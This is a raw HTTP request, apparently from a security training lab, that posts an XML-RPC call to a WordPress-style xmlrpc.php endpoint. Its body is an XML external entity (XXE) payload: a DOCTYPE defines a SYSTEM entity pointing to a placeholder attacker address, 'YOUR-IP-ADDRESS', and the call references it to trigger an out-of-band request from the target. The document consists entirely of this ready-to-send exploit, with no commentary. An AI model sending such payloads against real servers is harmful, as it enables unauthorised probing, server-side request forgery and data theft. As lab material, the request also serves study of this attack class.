POST /xmlrpc.php HTTP/1.1
Host: web-vxslkw.inst.malicecyber.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 386

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://YOUR-IP-ADDRESS/yolo'>]> 
<methodCall> 
<methodName>demo.addTwoNumbers</methodName> <root>&test;</root>
  <params>
    <param>
      <value>
      <int>1</int>
      </value>
    </param>
    <param>
      <value>
      <int>2</int>
      </value>
    </param>
  </params> 
</methodCall>

